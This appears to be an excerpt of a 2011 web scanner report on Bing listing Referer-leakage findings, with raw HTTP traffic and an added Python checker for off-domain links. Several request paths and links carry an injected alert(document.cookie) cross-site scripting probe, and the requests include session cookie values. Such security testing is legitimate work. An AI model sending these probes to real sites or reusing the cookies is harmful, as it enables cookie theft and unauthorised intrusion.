Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:18 GMT
Connection: close
Content-Length: 19043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_820137",IG:"94bb4e042d674fb7be1d3584654813e1",EventID:"9C07CEADCD3046CE815889272E90FA52",P:"SERP",DA:"Bl2",SUIH:"1_z7zQbanvRFNcd5-KBq6A",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/settings.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">.sw_box h1{margin:-1em 0 0 5px;display:inline-block;color:#525051;font-size:150%;padding-left:80px;float:left}</style><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Bobcat_EN-US790259691o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
function si_fbInit(d,c,e){var a=this;a.appNs=d;a.wfId=e;var b=0;a.loadCard=function(){if(!b){sj_jb(c,1);b=1}};a.openC
...[SNIP]...

5. Cross-domain Referer leakage
There are 8 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
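
A check for this finding, as an added example that is not part of the original report: it extracts absolute links whose registrable domain differs from the page's and lists the query parameters the browser would carry to them in Referer. The page URL and HTML are constructed from instance 5.1 below, and the registrable-domain function is a two-label simplification that a real tool would replace with the public-suffix list.

```python
"""Find off-domain links in a response and report what the page's own URL
would leak to them through the Referer header.

Added example, not part of the original report. PAGE_URL and SAMPLE_HTML are
constructed from instance 5.1; registrable_domain() is a deliberate
simplification (no public-suffix list).
"""
from __future__ import annotations

import html
import re
from urllib.parse import parse_qsl, urlsplit

PAGE_URL = ("http://www.bing.com/fd/fb/mulmfg?IG=343442e43b60467d81fa6f25a8ec9efd"
            "&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Flocal%2F")

# Constructed from the anchors shown in the 5.1 response excerpt, plus a
# relative link and a same-domain link to show what is not reported.
SAMPLE_HTML = """
<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;id=264960">Sign in</a></li>
<li><a href="/settings.aspx?ru=http%3a%2f%2fwww.bing.com">Preferences</a></li>
<a href="http://go.microsoft.com/fwlink/?LinkID=191371">Help</a>
<a href="http://search.bing.com/?q=x">Same registrable domain</a>
"""

HREF = re.compile(r'<a\b[^>]*\bhref\s*=\s*"([^"]*)"', re.I)


def registrable_domain(host: str) -> str:
    # Assumption: the last two labels. Real tooling should use the public-suffix list.
    return ".".join(host.lower().split(".")[-2:])


def cross_domain_links(page_url: str, body: str) -> list[str]:
    """Absolute links whose registrable domain differs from the page's own."""
    own = registrable_domain(urlsplit(page_url).hostname or "")
    found = []
    for raw in HREF.findall(body):
        href = html.unescape(raw)          # &amp; in markup is & on the wire
        host = urlsplit(href).hostname
        if host and registrable_domain(host) != own:
            found.append(href)
    return found


def leaked_parameters(page_url: str) -> list[tuple[str, str]]:
    """Query parameters a browser would carry to those links in Referer."""
    return parse_qsl(urlsplit(page_url).query, keep_blank_values=True)


def report(page_url: str, body: str) -> dict:
    return {"links": cross_domain_links(page_url, body),
            "params": leaked_parameters(page_url)}


if __name__ == "__main__":
    r = report(PAGE_URL, SAMPLE_HTML)
    print("Query parameters exposed in Referer:")
    for key, value in r["params"]:
        print(f"  {key} = {value}")
    print("Links on other domains that would receive them:")
    for link in r["links"]:
        print(f"  {link}")
```

Whether the IG and ru values here are sensitive is the review question the issue text poses; the script only makes the exposure visible. Browsers now also honour a Referrer-Policy header and rel="noreferrer" on links, neither of which this report mentions; they reduce the exposure, but the durable fix is the one in the remediation above, keeping sensitive values out of the query string.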


5.1. http://www.bing.com/fd/fb/mulmfg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/mulmfg

Issue detail

The page was loaded from a URL containing a query string (shown in the request below). The response contains links to other domains (shown in the response excerpt below).

Request

GET /fd/fb/mulmfg?IG=343442e43b60467d81fa6f25a8ec9efd&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Flocal%2F HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:29:31 GMT
Connection: close
Content-Length: 1424

<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1297466971&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252flocal%252f&amp;lc=1033&amp;id=264960" onmousedown="return si_T('&amp;ID=FD.FD.1,4.1')"><span id="sw_tliw">
...[SNIP]...
</a> &#xb7; <a href="http://go.microsoft.com/fwlink/?LinkID=191371" onmousedown="return si_T('&amp;ID=FD.FD.1,9.1')"><span>
...[SNIP]...

5.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The page was loaded from a URL containing a query string (shown in the request below). The response contains links to other domains (shown in the response excerpt below).

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f4d43589310840319542d23ff07183eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js
Content-Length: 18141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=js%2c%20undefined%2c%20aa461'-alert(document.cookie)-'6f0e1fe887b&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3djs%252c%2bundefined%252c%2baa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b%26cb%3d20110127.750" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.3. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The page was loaded from a URL containing a query string (shown in the request below). The response contains links to other domains (shown in the response excerpt below).

Request

GET /local/aa461'-alert(&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b18f22ca108041f092c7441b3e508e6b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&/undefined/js
Content-Length: 17463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=js%2c%20undefined%2c%20aa461'-alert(&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3djs%252c%2bundefined%252c%2baa461'-alert(%26%26cb%3d20110127.750" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.4. http://www.bing.com/local/details.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/details.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:38:07 GMT
Last-Modified: Fri, 11 Feb 2011 22:38:07 GMT
X-BM-TraceID: 1d919a3be99d459db6f09a5078524a98
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 306557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<div id = "atAGlance" class = "at-a-glance-module">
   <img src="http://blufiles.storage.msn.com/y1prg_6cJYChXMBpSrR2CyVt1M5A9kccp3DqvLzulHMmftXMCVLtB8CNqRIgBUdXfqYIFJFlIDhox0" class="biz-photo" alt="Hotel Helix" />

   <span class = "openClosedSign">
...[SNIP]...
</span>
   <a id="contactCard_website" title="Website" class="website" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">Website</a>
...[SNIP]...
<span class = "sentiment">
                                       Great Experience at Hotel Helix Washington, DC....
                                       <a id="scorecard_scorecardTable_scorecard0_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Other perks include: cheetah bathrobes, free Aveda products, daily newspaper, and free wireless Internet....
                                       <a id="scorecard_scorecardTable_scorecard1_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       The decor is very modern, bright, and upbeat....
                                       <a id="scorecard_scorecardTable_scorecard2_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       I love the fact that the king size bed is in it's own alcove and that it is hidden by lime green drapes....
                                       <a id="scorecard_scorecardTable_scorecard3_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Other perks include: cheetah bathrobes, free Aveda products, daily newspaper, and free wireless Internet....
                                       <a id="scorecard_scorecardTable_scorecard4_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
<span class = "sentiment">
                                       Wholefoods is 2 block away, the White House is 6 blks, and shopping is an 8 minute walk....
                                       <a id="scorecard_scorecardTable_scorecard5_reviews_ctl01_moreReviews" href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">more</a>
...[SNIP]...
m currently writing this review at the hotel. I wish I did not have to leave the Helix. I have traveled a lot and stayed in many hotels but this is one of the most unique hotels by far. The d...
                   <a href="http://www.judysbook.com/members/115891/posts/2009/8/576347/" id="reviews_userReviewsList_ctl01_A2" class="moreLink">Read full review</a>
...[SNIP]...
<li class = "ad">
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="head" onclick="window.open(this.href); return false;">Washington Flights</a>
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="body" onclick="window.open(this.href); return false;">Book Now & Save up to 65% on Washington Flights, plus Get $10 Off.</a>
<a href="http://13391.r.msn.com/?ld=4vkxUEX7Tx8QDc8MI49za5qV6Q7dHdq19iG8CrAlKGTjOfGzgmuxWpVYGvhkFN01ZfnO66eqtBB_o1kpdrUxkO4eP_mYW6ZXvh75d7qMFJKPGKjwC9C0CX3erScIx2yKKs-FjqwemN1BHXJVjRG_Gt1tQkJQII-KaprRv-VbmB1Yt3AcCe2YEQ-Bqgu3HGgjgi46liVsWNOmHrDxK3ForowA5pY5ZFPhmoT0LOM4OHt8iU7TuJxNdo8VU9zxs-hPjAEnGjoymsKOaTa7CgvBiq4jVUCUwnwFx6rXZuKlrm6x4B-_QEECZjcz1CVbjYgIeDQmmcHWi2NiqwvXjqty7kIv6rSXbkocxBBA" class="site" onclick="window.open(this.href); return false;">www.CheapOair.com/Washington</a>
...[SNIP]...
<li class = "ad">
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="head" onclick="window.open(this.href); return false;">Washington DC Tours</a>
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="body" onclick="window.open(this.href); return false;">See DC in One Day! Our daily tours show you all the DC attractions.</a>
<a href="http://814530.r.msn.com/?ld=4vo8TUM0CpB4jsm8P4mO5Er1ieDYKHGuRFoVl_B8MT0EF9X6RUjh05M_9-509_kYKffh3UqZo9ITrptaQl5MieHVJ8X9DxTxpTPYWgNE9L4-YJpFIZdEbYfSTLU-0eIslgZSzsB7NMhKDPRLHV85iRa9BVFbRgcvRt57hi0Y1jy102iFRJbs3ePN0CAONnfHvVOycW866H2cGBCqC5pmZGZahcAilGylY_SYPE9HKl2Kg1VAlMxs2-9dPoJ8XW3hkq58PEaBAmY3M9IMAr6u6hGcEY94iQdYCALdPdQecRagBVCIridx73nVM" class="site" onclick="window.open(this.href); return false;">www.OnBoardDCTours.com</a>
...[SNIP]...
<li class = "ad">
